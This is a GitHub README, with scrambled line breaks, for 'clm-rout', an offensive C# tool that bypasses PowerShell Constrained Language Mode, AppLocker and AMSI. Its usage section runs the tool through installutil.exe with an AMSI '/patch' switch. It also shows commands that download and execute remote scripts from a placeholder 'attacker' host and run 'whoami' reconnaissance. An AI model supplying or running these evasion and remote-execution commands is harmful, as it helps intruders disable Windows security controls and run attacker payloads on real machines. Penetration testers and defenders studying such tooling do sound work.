A C# program featuring an all-in-one bypass for CLM, AppLocker and AMSI using Runspace.
BSD-3-CLAUSE License
PowerShell Constrained Language Mode
(CLM
), AppLocker
and Antimalware Scan Interface
(AMSI
) using Runspace.AppLocker
.CLM
.AMSI
via the /pacth
command switch./cmd=<cmd>
command switch./url=<http(s)://foo.bar/foobar>
command switch.stdout
and stderr
).Clone/download clm-rout
:
git clone https://github.com/aress31/clm-rout
Build the project with Visual Studio 2022
.
function run {
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe `
/uninstall /logfile= /LogToConsole=false `
/patch $Args `
C:\users\foo\CLMRout.exe
}
Execute command(s):
run /cmd="hostname; whoami"
Execute remote script(s):
run /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
Execute remote script(s) followed by command(s):
run /cmd="hostname; whoami" /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee ☕/lamborghini 🚗) - as a lot of my personal time went into creating this project. 😪
It is easy, all you got to do is press the Sponsor
button at the top of this page or alternatively click this link. 😁
Found a bug 🐛? I would love to squash it!
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project? 🤩
Please submit all PRs
on the GitHub pull requests tracker.
clm-rout
is distributed under the terms of the BSD 3
.
See LICENSE for details.